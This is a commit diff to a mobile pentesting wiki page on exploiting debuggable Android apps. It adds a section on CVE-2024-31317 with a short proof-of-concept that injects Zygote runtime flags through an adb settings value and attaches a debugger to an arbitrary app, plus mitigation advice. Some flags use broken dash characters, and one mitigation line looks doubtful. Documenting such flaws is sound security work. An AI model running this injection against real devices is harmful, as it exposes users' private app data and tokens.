Add content from: Research Update: Enhanced src/mobile-pentesting/android-app-...

HackTricks News Bot · HackTricks News Bot · commit 71eedb35c250 · 2025-07-25T08:29:12.000Z
diff --git a/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md b/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
@@ -15,7 +15,7 @@ Content based on https://medium.com/@shubhamsonani/hacking-with-precision-bypass
 1. **Decompile the APK:**
 
    - Utilize the APK-GUI tool for decompiling the APK.
-   - In the _android-manifest_ file, insert `android:debuggable=true` to enable debugging mode.
+   - In the _android-manifest_ file, insert `android:debuggable="true"` to enable debugging mode.
    - Recompile, sign, and zipalign the modified application.
 
 2. **Install the Modified Application:**
@@ -30,7 +30,7 @@ Content based on https://medium.com/@shubhamsonani/hacking-with-precision-bypass
 
    - Command: `adb shell am setup-debug-app –w <package_name>`.
    - **Note:** This command must be run each time before starting the application to ensure it waits for the debugger.
-   - For persistence, use `adb shell am setup-debug-app –w -–persistent <package_name>`.
+   - For persistence, use `adb shell am setup-debug-app –w ––persistent <package_name>`.
    - To remove all flags, use `adb shell am clear-debug-app <package_name>`.
 
 5. **Prepare for Debugging in Android Studio:**
@@ -83,12 +83,47 @@ A demonstration was provided using a vulnerable application containing a button
 
 This example demonstrated how the behavior of a debuggable application can be manipulated, highlighting the potential for more complex exploits like gaining shell access on the device in the application's context.
 
+---
+
+# 2024 – Turning **any** application into a debuggable process (CVE-2024-31317)
+
+Even if the target APK is _not_ shipped with the `android:debuggable` flag, recent research showed that it is possible to force **arbitrary applications** to start with the `DEBUG_ENABLE_JDWP` runtime flag by abusing the way Zygote parses command-line arguments.
+
+*   **Vulnerability:** Improper validation of `--runtime-flags` supplied through Zygote’s command socket allows an attacker that can reach `system_server` (for example via the privileged `adb` shell which owns the `WRITE_SECURE_SETTINGS` permission) to inject extra parameters. When the crafted command is replayed by `system_server`, the victim app is forked as _debuggable_ and with a JDWP thread listening. The issue is tracked as **CVE-2024-31317** and was fixed in the June 2024 Android Security Bulletin.
+*   **Impact:** Full read/write access to the private data directory of **any** app (including privileged ones such as `com.android.settings`), token theft, MDM bypass, and in many cases a direct path to privilege-escalation by abusing exported IPC endpoints of the now-debuggable process.
+*   **Affected versions:** Android 9 through 14 prior to the June 2024 patch level.
+
+## Quick PoC
+
+```bash
+# Requires: adb shell (device must be <2024-06-01 patch-level)
+# 1. Inject a fake API-denylist exemption that carries the malicious Zygote flag
+adb shell settings put global hidden_api_blacklist_exemptions "--runtime-flags=0x104|Lcom/example/Fake;->entryPoint:"
+
+# 2. Launch the target app – it will be forked with DEBUG_ENABLE_JDWP
+adb shell monkey -p com.victim.bank 1
+
+# 3. Enumerate JDWP PIDs and attach with jdb / Android-Studio
+adb jdwp               # obtain the PID
+adb forward tcp:8700 jdwp:<pid>
+jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=8700
+```
+
+> The crafted value in step 1 breaks the parser out of the “fast-path” and appends a second synthetic command where `--runtime-flags=0x104` (`DEBUG_ENABLE_JDWP | DEBUG_JNI_DEBUGGABLE`) is accepted as if it had been supplied by the framework. Once the app is spawned, a JDWP socket is opened and regular dynamic-debug tricks (method replacement, variable patching, live Frida injection, etc.) are possible **without modifying the APK or the device boot image**.
+
+## Detection & Mitigation
+
+*   Patch to **2024-06-01** (or later) security level – Google hardened `ZygoteCommandBuffer` so that subsequent commands cannot be smuggled in this way.
+*   Restrict `WRITE_SECURE_SETTINGS` / `shell` access on production devices. The exploit requires this permission, which is normally only held by ADB or OEM-privileged apps.
+*   On EMM/MDM-managed fleets, enforce `ro.debuggable=0` and deny shell via `adb disable-verifier`.
+
+---
+
 ## References
 
 - [https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0)
 - [https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications)
+- [https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html](https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html)
+- [https://blog.flanker017.me/cve-2024-31317/](https://blog.flanker017.me/cve-2024-31317/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
